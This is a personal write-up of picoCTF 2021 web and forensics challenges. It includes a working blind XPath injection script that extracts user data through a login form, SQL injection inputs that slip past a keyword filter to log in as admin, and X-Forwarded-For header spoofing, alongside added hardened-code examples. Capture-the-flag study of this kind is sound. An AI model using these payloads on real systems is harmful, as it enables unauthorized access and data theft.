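I took part in picoCTF 2021 as Pui-Pui-CTFer together with @Satoooon1024 and @miso_2324, and we placed 11th in the world and 1st in Japan.

I'll write up how I solved things.

Note that I have removed the port numbers from the URLs.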

Web

Who are you?

Author: madStacks

#### Description

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn

Hints:
It ain't much, but it's an RFC https://tools.ietf.org/html/rfc2616

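This one really stuck in my memory, so I'm keeping it as a writeup.

You get to the next step by adding headers one after another, but the one instruction to access from Sweden would not pass no matter what I did. 👇 The brute force from hell, lol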

```
Host: mercury.picoctf.net:1270 Sweden sv sv-SE
Referer: http://mercury.picoctf.net
Date: 2018
User-Agent: PicoBrowser Sweden sv sv-SE
DNT: 1
Location: Sweden sv sv-SE
Accept: Sweden sv sv-SE
Accept-Language: Sweden sv sv-SE
Accept-Ranges: Sweden sv sv-SE
Content-Language: Sweden sv sv-SE
Content-Location: Sweden sv sv-SE
Via: Sweden sv sv-SE
Vary: Sweden sv sv-SE
Country: Sweden sv sv-SE
Country-Code: Sweden sv sv-SE
Authorization: Sweden sv sv-SE
Age: Sweden sv sv-SE
Cache-Control: Sweden sv sv-SE
Expires: Sweden sv sv-SE
Pragma: Sweden sv sv-SE
Forwarded: Sweden sv sv-SE
X-Forwarded-For: Sweden sv sv-SE
X-Forwarded-Host: Sweden sv sv-SE
Location: Sweden sv sv-SE
Allow: Sweden sv sv-SE
Server: Sweden sv sv-SE
Range: Sweden sv sv-SE
Signature: Sweden sv sv-SE
X-DNS-Prefetch-Control: Sweden sv sv-SE
Live: Sweden sv sv-SE
From: Sweden sv sv-SE
Love: Sweden sv sv-SE
Accept-Charset: x-IA5-Swedish
Warning: 199 Sweden "Sweden"
X-Appengine-Country: SE Sweden
```

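I tried accessing from Norway with an Azure VM and from Sweden through some odd OpenVPN, but it didn't work. After trying all sorts of things (and "all sorts" means one week, that's crazy, right?), it passed when I put the IP address of Sweden.se into X-Forwarded-For.

Summary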

```
Host: mercury.picoctf.net:1270
Referer: http://mercury.picoctf.net
Date: 2018
User-Agent: PicoBrowser
DNT: 1
X-Forwarded-For: 139.162.171.198
Accept-Language: sv
```
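
Why a location check built on `X-Forwarded-For` can be satisfied by any client, and the usual server-side fix, as an added example (not code from the challenge or from the original post): the header is believed only when the TCP peer is a known reverse proxy. The proxy range, the `203.0.113.7` client address and the function names are assumptions.

```python
import ipaddress

# Assumption: the only hosts allowed to set X-Forwarded-For are our own
# reverse proxies in this (constructed) range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def is_trusted_proxy(addr):
    """True if addr parses as an IP inside a trusted proxy network."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def naive_client_ip(peer_addr, headers):
    """Weak: believes the leftmost X-Forwarded-For entry, which the client controls."""
    first = headers.get("X-Forwarded-For", "").split(",")[0].strip()
    return first or peer_addr


def client_ip(peer_addr, headers):
    """Hardened: start from the TCP peer and step left through
    X-Forwarded-For only while the current hop is one of our proxies."""
    current = peer_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        if not is_trusted_proxy(current):
            break  # current is not ours, so nothing it sent is believed
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: keep the last verified address
        current = hop
    return current


# Constructed requests as (TCP peer, headers). 139.162.171.198 is the
# header value from the summary above.
DIRECT = ("203.0.113.7", {"X-Forwarded-For": "139.162.171.198"})
VIA_PROXY = ("10.0.0.5", {"X-Forwarded-For": "139.162.171.198, 203.0.113.7"})

if __name__ == "__main__":
    for peer, headers in (DIRECT, VIA_PROXY):
        print(peer, "naive:", naive_client_ip(peer, headers),
              "hardened:", client_ip(peer, headers))
```

In both constructed requests the naive resolver reports the header value, while the hardened one reports the address that actually connected.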

X marks the spot

Author: madStacks

#### Description

Another login you have to bypass. Maybe you can find an injection that works? [http://mercury.picoctf.net](http://mercury.picoctf.net)

Hints:
XPATH

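Both the username and password fields react to `'`.

The cookie being PHPSESSID=07vik3l3efg925bifu0j36pa5f catches my attention.

The hint is XPATH, so I figured this looks like XPath injection and looked it up. I stared hard at https://book.hacktricks.xyz/pentesting-web/xpath-injection and https://owasp.org/www-community/attacks/XPATH_Injection and thought about it.

With `x' or 1=1 or 'x'='y`, `admin' or '`, or `guest' or '`, the top of the site shows you're the right path. After that, I put together what I had worked hard to research.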

```python
import requests
import string

# Target URL as written in this writeup (port number removed)
URL = "http://mercury.picoctf.net"
alphabet = string.ascii_letters + string.digits + "{}_()!./"


def oracle(exploit):
    # The page shows "right path" when the injected condition is true
    r = requests.post(URL, data={'name': exploit, 'pass': ''})
    return "right path" in r.text


def number_of_nodes():
    # Find the value of count(//user/child::node()); used below as the
    # upper bound for the child index
    for i in range(30):
        exploit = """' or count(//user/child::node())={} or ''='""".format(i)
        if oracle(exploit):
            return i
    return 0  # not found in range


def string_length(user, child):
    # Find the string length of one child node of one user
    for i in range(100):
        exploit = """' or string-length(//user[position()={0}]/child::node()[position()={1}])={2} or ''='""".format(user, child, i)
        if oracle(exploit):
            return i
    return 0  # not found in range


def search(user, child, l):
    # Recover the node text one character at a time with substring()
    flag = ""
    for num in range(1, l+1):
        for al in alphabet:
            exploit = """' or substring((//user[position()={0}]/child::node()[position()={1}]),{2},1)="{3}" or ''='""".format(user, child, num, al)
            if oracle(exploit):
                flag += al
                break
    return flag


nodes = number_of_nodes()
for user in range(1, 11):
    for child in range(1, nodes+1):
        l = string_length(user, child)
        print("user:", user, "child:", child, "len:", l, "flag:", search(user, child, l))
```

Forensic

The infamous forensics category. This time too there were many challenges that lived up to the name, and they were very tough.

information

Author: susie

#### Description

Files can always be changed in a secret way. Can you find the flag? [cat.jpg](https://mercury.picoctf.net/static/b4d62f6e431dc8e563309ea8c33a06b3/cat.jpg)

Hints:
Look at the details of the file
Make sure to submit the flag as picoCTF{XXXXX}

cat and strings didn't turn anything up, and while I was thinking "huh?", exiftool gave it to me.

```
ExifTool Version Number         : 12.05
File Name                       : cat.jpg
Directory                       : .
File Size                       : 858 kB
File Modification Date/Time     : 2021:03:16 03:24:46+09:00
File Access Date/Time           : 2021:04:02 23:11:56+09:00
File Inode Change Date/Time     : 2021:04:01 05:40:51+09:00
File Permissions                : rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Current IPTC Digest             : 7a78f3d9cfb1ce42ab5a3aa30573d617
Copyright Notice                : PicoCTF
Application Record Version      : 4
XMP Toolkit                     : Image::ExifTool 10.80
License                         : cGljb0NURnt0aGVfbTN0YWRhdGFfMXNfbW9kaWZpZWR9
Rights                          : PicoCTF
Image Width                     : 2560
Image Height                    : 1598
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 2560x1598
Megapixels                      : 4.1
```

I think License is probably the flag.

Matryoshka doll

Author: Susie/Pandu

#### Description

Matryoshka dolls are a set of wooden dolls of decreasing size placed one inside another. What's the final one? Image: [this](https://mercury.picoctf.net/static/5ef2e9103d55972d975437f68175b9ab/dolls.jpg)

Hints:
Wait, you can hide files inside files? But how do you find them?
Make sure to submit the flag as picoCTF{XXXXX}

Running foremost on it made the flag come out.

MacroHard WeakEdge

Author: madStacks

#### Description

I've hidden a flag in this file. Can you find it? [Forensics is fun.pptm](https://mercury.picoctf.net/static/c0da20f29337e87ffb58ea987d8c596e/Forensics is fun.pptm)

Hints:
(None)

There is a video on DEFCON's YouTube where they used something called oletools, so I imitated it and the flag came out.

Trivial Flag Transfer Protocol

Author: Danny

#### Description

Figure out how they moved the [flag](https://mercury.picoctf.net/static/4fe0f4357f7458c6892af394426eab55/tftp.pcapng).

Hints:
What are some other ways to hide data?

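Doing a file export for tftp gives you three bmp files, two text files, and program.deb.

The deb contains steghide, so I thought there might be some password and ran steghide against the first bmp. I tried various passphrases, but none of them worked.

The plan says I USED THE PROGRAM AND HID IT WITH DUE DILIGENCE. CHECK OUT THE PHOTOS, and since Due Diligence can be abbreviated as DD, I thought it might be hidden in picture2, where binwalk finds all sorts of things, but nothing I tried worked.

In the end, picture1 and picture2 were decoys, picture3 was the real one, and DUEDILIGENCE was the passphrase. Hmmm.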

Disk, disk, sleuth!

Author: syreal

#### Description

Use `srch_strings` from the sleuthkit and some terminal-fu to find a flag in this disk image: [dds1-alpine.flag.img.gz](https://mercury.picoctf.net/static/f63e4eba644c99e92324b65cbd875db6/dds1-alpine.flag.img.gz)

Hints:
Have you ever used `file` to determine what a file was?
Relevant terminal-fu in picoGym: https://play.picoctf.org/practice/challenge/85
Mastering this terminal-fu would enable you to find the flag in a single command: https://play.picoctf.org/practice/challenge/48
Using your own computer, you could use qemu to boot from this disk!

strings gives you the answer.

Milkslap

Author: James Lynch

#### Description

[🥛](http://mercury.picoctf.net)

Hints:
Look at the problem category

zsteg gives you the answer.

Disk, disk, sleuth! II

Author: syreal

#### Description

All we know is the file with the flag is named `down-at-the-bottom.txt`... Disk image: [dds2-alpine.flag.img.gz](https://mercury.picoctf.net/static/544be9762e9f9c0adcbeb7bcf27f49a2/dds2-alpine.flag.img.gz)

Hints:
The sleuthkit has some great tools for this challenge as well.
Sleuthkit docs here are so helpful: [TSK Tool Overview](http://wiki.sleuthkit.org/index.php?title=TSK_Tool_Overview)
This disk can also be booted with qemu!

strings did not give the answer. Sad.

Looking at down-at-the-bottom.txt in autopsy, the flag was there.

Surfing the Waves

Author: William Batista

#### Description

While you're going through the FBI's servers, you stumble across their incredible taste in music. One [main.wav](https://mercury.picoctf.net/static/2a75da7f60d50bbaca9f9d3f1dec85ae/main.wav) you found is particularly interesting, see if you can find the flag!

Hints:
Music is cool, but what other kinds of waves are there?
Look deep below the surface

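This one also took a week to solve 💢. I wrote about it in quite some detail in the notes I shared with the team during the event, so I'll paste them here as they are.

What does "Look deep below the surface" in the challenge text mean? I thought removing the diagonal line after the FFT might get me somewhere, but it didn't. Looking at the spectrogram view in Audacity doesn't show anything in particular either... If I remove too much noise, it turns into a single beep tone.

The FFT result looks obviously suspicious, so this shouldn't be wrong.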

fft

```python
import scipy.io.wavfile
import numpy as np
import matplotlib.pyplot as plt


wav_filename = "./flag.wav"
rate, data = scipy.io.wavfile.read(wav_filename)

# Normalize the 16-bit samples to the range [-1, 1)
data = data / 32768

# Magnitude spectrum and the matching frequency axis (Hz)
fft_data = np.abs(np.fft.fft(data))
freqList = np.fft.fftfreq(data.shape[0], d=1.0/rate)
plt.plot(freqList, fft_data)
plt.xlim(0, 1500)
plt.show()
```

Remove the diagonal line that showed up in the FFT (my take on "below the surface")

```python
import sys
import numpy as np
import scipy.fftpack
import wave

N = 1024  # samples per FFT block


def editsound(databuf):
    # Work through the buffer in blocks of N samples: zero every frequency
    # bin whose magnitude exceeds the threshold, then transform back
    databuf1 = np.zeros(databuf.size)
    for i in range(int(databuf.size / N)):
        yf = scipy.fftpack.fft(databuf[N * i: N * (i+1)])
        yf[abs(yf) > 700000] = 0

        databuf1[N * i: N * (i+1)] = scipy.fftpack.ifft(yf).real
    return databuf1


wavefile = wave.open('main.wav', "rb")
buf = wavefile.readframes(wavefile.getnframes())
buf = np.frombuffer(buf, dtype="int16")
wavefile.close()
print(wavefile.getparams())
sounddata = buf.copy()  # buffer for the sound data
# Filter the even- and odd-indexed samples separately
sounddata[0::2] = editsound(sounddata[0::2])
sounddata[1::2] = editsound(sounddata[1::2])
writewave = wave.open("flag.wav", "wb")
writewave.setparams(wavefile.getparams())
writewave.writeframes(sounddata.tobytes())
writewave.close()
sys.exit()
```

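Actually, beneath the picture with the diagonal line removed there is another diagonal line...

I can't help feeling this is wrong

But I feel like it does fit what the challenge text says

Looking at the official Discord, people are saying it can be done with Audacity

I see, I see (really?)

Is it abnormal that the wave only exists above the middle?

The same waveform is lined up many times (I think)

Writeups that look similar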

https://ctftime.org/writeup/11405

https://ctftime.org/writeup/21167

Like dial-up!?

It certainly looks a lot like the last part of this

https://www.youtube.com/watch?v=WflkFUY9pHI

```python
import scipy.io.wavfile
wav_filename = "./main.wav"
rate, data = scipy.io.wavfile.read(wav_filename)

# Distinct sample values and how many of them there are
print(set(data), len(set(data)))
```

```
{8500, 8501, 8502, 8503, 8504, 8505, 8506, 8507, 8508, 8509, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 7500, 7501, 7502, 7503, 7504, 7505, 7506, 7507, 7508, 7509, 7000, 7001, 7002, 7003, 7004, 7005, 7006, 7007, 7008, 7009, 6500, 6501, 6502, 6503, 6507, 6508, 6509, 6000, 6001, 6002, 6003, 6004, 6005, 6006, 6007, 6008, 6009, 5500, 5501, 5502, 5503, 5504, 5505, 5506, 5507, 5508, 5509, 5000, 5001, 5002, 5003, 5004, 5005, 5006, 5007, 5008, 5009, 4500, 4501, 4502, 4503, 4504, 4505, 4506, 4507, 4508, 4509, 4000, 4001, 4002, 4003, 4004, 4005, 4006, 4007, 4008, 4009, 3500, 3501, 3502, 3503, 3504, 3505, 3506, 3507, 3508, 3509, 3000, 3001, 3002, 3003, 3004, 3005, 3006, 3007, 3008, 3009, 2500, 2501, 2502, 2503, 2504, 2505, 2506, 2507, 2508, 2509, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1000, 1001, 1002, 1003, 1004, 1005, 1006, 1007, 1008, 1009} 157
```

The values are spread out in steps of 500n+9. --> The frequencies are shown below (the two are the same, just written differently)

```
[1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1500 1501 1502 1503
 1504 1505 1506 1507 1508 1509 2000 2001 2002 2003 2004 2005 2006 2007
 2008 2009 2500 2501 2502 2503 2504 2505 2506 2507 2508 2509 3000 3001
 3002 3003 3004 3005 3006 3007 3008 3009 3500 3501 3502 3503 3504 3505
 3506 3507 3508 3509 4000 4001 4002 4003 4004 4005 4006 4007 4008 4009
 4500 4501 4502 4503 4504 4505 4506 4507 4508 4509 5000 5001 5002 5003
 5004 5005 5006 5007 5008 5009 5500 5501 5502 5503 5504 5505 5506 5507
 5508 5509 6000 6001 6002 6003 6004 6005 6006 6007 6008 6009 6500 6501
 6502 6503 6507 6508 6509 7000 7001 7002 7003 7004 7005 7006 7007 7008
 7009 7500 7501 7502 7503 7504 7505 7506 7507 7508 7509 8000 8001 8002
 8003 8004 8005 8006 8007 8008 8009 8500 8501 8502 8503 8504 8505 8506
 8507 8508 8509]
[26 32 28 23 29 28 32 25 27 24  4  3 13 12  6 12 13  2  8 10 38 35 41 36
 38 32 22 33 39 34 22 15 12 15 16 15 18 26 14 18 10  5 11 12 10  8  8 11
 15 15 14 22 20 23 21 26 22 15 20 24 68 58 52 61 72 60 78 69 66 67 26 47
 29 39 36 16 37 35 43 29 13 10  4  8 13  8 13 11  5  8  9 17 12  8  7  8
 19 19 20 16  3  7 13  6  3  7  9  6  2  5  5  2  1  3  2  4  2  4  4  2
  4  2  2  3  1  4  6  7  7  6  6 11  3  9 10  4  7  6  6  9  8  8  6 10
  7  5 10 10  2  5  8  8  9  6 16  4  7]
```

```
1000:26, 1001:32, 1002:28, 1003:23, 1004:29, 1005:28, 1006:32, 1007:25, 1008:27, 1009:24, 1500:4, 1501:3, 1502:13, 1503:12, 1504:6, 1505:12, 1506:13, 1507:2, 1508:8, 1509:10, 2000:38, 2001:35, 2002:41, 2003:36, 2004:38, 2005:32, 2006:22, 2007:33, 2008:39, 2009:34, 2500:22, 2501:15, 2502:12, 2503:15, 2504:16, 2505:15, 2506:18, 2507:26, 2508:14, 2509:18, 3000:10, 3001:5, 3002:11, 3003:12, 3004:10, 3005:8, 3006:8, 3007:11, 3008:15, 3009:15, 3500:14, 3501:22, 3502:20, 3503:23, 3504:21, 3505:26, 3506:22, 3507:15, 3508:20, 3509:24, 4000:68, 4001:58, 4002:52, 4003:61, 4004:72, 4005:60, 4006:78, 4007:69, 4008:66, 4009:67, 4500:26, 4501:47, 4502:29, 4503:39, 4504:36, 4505:16, 4506:37, 4507:35, 4508:43, 4509:29, 5000:13, 5001:10, 5002:4, 5003:8, 5004:13, 5005:8, 5006:13, 5007:11, 5008:5, 5009:8, 5500:9, 5501:17, 5502:12, 5503:8, 5504:7, 5505:8, 5506:19, 5507:19, 5508:20, 5509:16, 6000:3, 6001:7, 6002:13, 6003:6, 6004:3, 6005:7, 6006:9, 6007:6, 6008:2, 6009:5, 6500:5, 6501:2, 6502:1, 6503:3, 6507:2, 6508:4, 6509:2, 7000:4, 7001:4, 7002:2, 7003:4, 7004:2, 7005:2, 7006:3, 7007:1, 7008:4, 7009:6, 7500:7, 7501:7, 7502:6, 7503:6, 7504:11, 7505:3, 7506:9, 7507:10, 7508:4, 7509:7, 8000:6, 8001:6, 8002:9, 8003:8, 8004:8, 8005:6, 8006:10, 8007:7, 8008:5, 8009:10, 8500:10, 8501:2, 8502:5, 8503:8, 8504:8, 8505:9, 8506:6, 8507:16, 8508:4, 8509:7
```

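The 4000s are abnormally frequent

This writeup ~~might be helpful?~~ was helpful. If I hadn't looked at Discord and been told that there is a writeup of a similar challenge, I couldn't have solved it. https://ctftime.org/writeup/21370 Looking at the wav data two samples at a time (assuming they are lined up as first, second, first, second, ...)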

```
1000:8, 1001:8, 1002:9, 1003:7, 1004:8, 1005:6, 1006:10, 1007:7, 1008:5, 1009:9, 2000:29, 2001:25, 2002:32, 2003:30, 2004:34, 2005:20, 2006:17, 2007:28, 2008:32, 2009:23, 2500:10, 2501:6, 2502:9, 2503:7, 2504:7, 2505:5, 2506:11, 2507:15, 2508:5, 2509:6, 3000:2, 3001:1, 3002:1, 3003:1, 3008:1, 3009:1, 3500:3, 3501:5, 3502:6, 3503:8, 3504:6, 3505:9, 3506:4, 3507:4, 3508:9, 3509:9, 4000:57, 4001:54, 4002:47, 4003:57, 4004:63, 4005:49, 4006:68, 4007:61, 4008:55, 4009:63, 4500:24, 4501:43, 4502:24, 4503:34, 4504:28, 4505:12, 4506:36, 4507:31, 4508:37, 4509:27
```

```
1000:18, 1001:24, 1002:19, 1003:16, 1004:21, 1005:22, 1006:22, 1007:18, 1008:22, 1009:15, 1500:4, 1501:3, 1502:13, 1503:12, 1504:6, 1505:12, 1506:13, 1507:2, 1508:8, 1509:10, 2000:9, 2001:10, 2002:9, 2003:6, 2004:4, 2005:12, 2006:5, 2007:5, 2008:7, 2009:11, 2500:12, 2501:9, 2502:3, 2503:8, 2504:9, 2505:10, 2506:7, 2507:11, 2508:9, 2509:12, 3000:8, 3001:4, 3002:10, 3003:11, 3004:10, 3005:8, 3006:8, 3007:11, 3008:14, 3009:14, 3500:11, 3501:17, 3502:14, 3503:15, 3504:15, 3505:17, 3506:18, 3507:11, 3508:11, 3509:15, 4000:11, 4001:4, 4002:5, 4003:4, 4004:9, 4005:11, 4006:10, 4007:8, 4008:11, 4009:4, 4500:2, 4501:4, 4502:5, 4503:5, 4504:8, 4505:4, 4506:1, 4507:4, 4508:6, 4509:2, 5000:13, 5001:10, 5002:4, 5003:8, 5004:13, 5005:8, 5006:13, 5007:11, 5008:5, 5009:8, 5500:9, 5501:17, 5502:12, 5503:8, 5504:7, 5505:8, 5506:19, 5507:19, 5508:20, 5509:16, 6000:3, 6001:7, 6002:13, 6003:6, 6004:3, 6005:7, 6006:9, 6007:6, 6008:2, 6009:5, 6500:5, 6501:2, 6502:1, 6503:3, 6507:2, 6508:4, 6509:2, 7000:4, 7001:4, 7002:2, 7003:4, 7004:2, 7005:2, 7006:3, 7007:1, 7008:4, 7009:6, 7500:7, 7501:7, 7502:6, 7503:6, 7504:11, 7505:3, 7506:9, 7507:10, 7508:4, 7509:7, 8000:6, 8001:6, 8002:9, 8003:8, 8004:8, 8005:6, 8006:10, 8007:7, 8008:5, 8009:10, 8500:10, 8501:2, 8502:5, 8503:8, 8504:8, 8505:9, 8506:6, 8507:16, 8508:4, 8509:7
```

But the ones digit varies, so is rounding it off not OK...? what other kinds of waves are there?

Got the answer

```python
import scipy.io.wavfile


wav_filename = "./main.wav"
rate, data = scipy.io.wavfile.read(wav_filename)

with open("flag", "wb") as f:
    # Take the samples two at a time: the first gives the high nibble and
    # the second the low nibble of one output byte
    for i in range(0, len(data) - 1, 2):
        hi = int((data[i] - 1000) / 500)
        lo = int((data[i+1] - 1000) / 500)
        c = bytearray([hi * 16 + lo])
        if i < 50:
            print(c)
        f.write(c)
```

Output

```python
#!/usr/bin/env python3
import numpy as np
from scipy.io.wavfile import write
from binascii import hexlify
from random import random
with open('generate_wav.py', 'rb') as f:
	content = f.read()
	f.close()
# Convert this program into an array of hex values
hex_stuff = (list(hexlify(content).decode("utf-8")))
# Loop through the each character, and convert the hex a-f characters to 10-15
for i in range(len(hex_stuff)):
	if hex_stuff[i] == 'a':
		hex_stuff[i] = 10
	elif hex_stuff[i] == 'b':
		hex_stuff[i] = 11
	elif hex_stuff[i] == 'c':
		hex_stuff[i] = 12
	elif hex_stuff[i] == 'd':
		hex_stuff[i] = 13
	elif hex_stuff[i] == 'e':
		hex_stuff[i] = 14
	elif hex_stuff[i] == 'f':
		hex_stuff[i] = 15
	# To make the program actually audible, 100 hertz is added from the beginning, then the number is multiplied by
	# 500 hertz
	# Plus a cheeky random amount of noise
	hex_stuff[i] = 1000 + int(hex_stuff[i]) * 500 + (10 * random())
def sound_generation(name, rand_hex):
	# The hex array is converted to a 16 bit integer array
	scaled = np.int16(np.array(hex_stuff))
	# Sci Pi then writes the numpy array into a wav file
	write(name, len(hex_stuff), scaled)
	randomness = rand_hex
# Pump up the music!
# print("Generating main.wav...")
# sound_generation('main.wav')
# print("Generation complete!")
# Your ears have been blessed
# picoCTF{mU21C_1s_1337_6a936af2}
```

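I had been solving without looking at Discord until partway through ~~isn't that normal?~~, so I was going around in circles.

Other

During the competition I got fed up with forensics and solved a few challenges in other categories (no points were added, since my teammates had already solved them). I want to take my time with pwn and rev, so I did web and crypto.

Among those there was a web challenge that seemed to have multiple solutions, so I'll write down my own approach just in case.

(Added 4/8) Looking at other people's writeups, their approach is different, but mine is the same as my teammate's, which is interesting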

Web

Web Gauntlet 2

Author: madStacks

#### Description

This website looks familiar... Log in as admin Site: [http://mercury.picoctf.net/](http://mercury.picoctf.net/) Filter: [http://mercury.picoctf.net/filter.php](http://mercury.picoctf.net/filter.php)

Hints:
I tried to make it a little bit less contrived since the mini competition.
Each filter is separated by a space. Spaces are not filtered.
There is only 1 round this time, when you beat it the flag will be in filter.php.
There is a length component now.
sqlite

Entering `'` breaks it. Apparently it is `SELECT username, password FROM users WHERE username=''' AND password='a'` with Filters: `or and true false union like = > < ; -- /* */ admin`.

Looking at this, https://github.com/w181496/Web-CTF-Cheatsheet, it seems substr can get me somewhere.

name: `'||substr(`, pass: `'admi',-4)||'n`
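
Why the word blocklist does not help while a bound parameter does, using the filter list and the input pair quoted above against a constructed in-memory SQLite table (an added example, not the challenge's code; the table contents, the case-insensitive substring matching of the filter and all function names are assumptions):

```python
import sqlite3

# Filter words as listed on this page
FILTERS = ["or", "and", "true", "false", "union", "like", "=", ">", "<",
           ";", "--", "/*", "*/", "admin"]

# Input pair from this page
PAGE_NAME = "'||substr("
PAGE_PASS = "'admi',-4)||'n"


def make_db():
    """Constructed table with a single admin row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def passes_filter(value):
    """Assumed filter behaviour: reject input containing any listed word."""
    low = value.lower()
    return not any(word in low for word in FILTERS)


def login_concat(db, name, pw):
    """Weak: blocklist, then the inputs are pasted into the SQL text."""
    if not (passes_filter(name) and passes_filter(pw)):
        return None
    sql = ("SELECT username, password FROM users "
           "WHERE username='" + name + "' AND password='" + pw + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_param(db, name, pw):
    """Hardened: inputs are bound as values and never parsed as SQL."""
    row = db.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (name, pw),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The quotes in the two inputs re-pair so that the query's own
    # " AND password=" text ends up inside a string literal.
    print("concatenated:", login_concat(db, PAGE_NAME, PAGE_PASS))
    print("parameterized:", login_param(db, PAGE_NAME, PAGE_PASS))
    print("legitimate login:", login_param(db, "admin", "constructed-secret"))
```

With bound parameters the filter list is unnecessary, so a legitimate `admin` login no longer has to be rejected for containing a filtered word.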

Web Gauntlet 3

Author: madStacks

#### Description

Last time, I promise! Only 25 characters this time. Log in as admin Site: [http://mercury.picoctf.net/](http://mercury.picoctf.net/) Filter: [http://mercury.picoctf.net/filter.php](http://mercury.picoctf.net/filter.php)

Hints:
Each filter is separated by a space. Spaces are not filtered.
There is only 1 round this time, when you beat it the flag will be in filter.php.
sqlite

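The exact same thing as in Web Gauntlet 2 passed? What were they trying to do???

Thoughts

I have taken part in picoCTF twice with my club, and I knew before it started that there would be a great many crappy challenges.

I don't particularly want to solve crappy challenges, but they take a very long time to solve (well, of course, it's brute force), so I started with misc and forensics first.

On the first day, thinking that my teammates were working hard from early in the morning, I solved general skills. There were no terrible guesses, and I moved on to forensics and devoted all of the remaining time to forensics. I also did Sweden while I was at it.

Solving only forensics doesn't give me the feeling of having done much, so I'd like to go on and solve the challenges that looked interesting while I watched my teammates solve them.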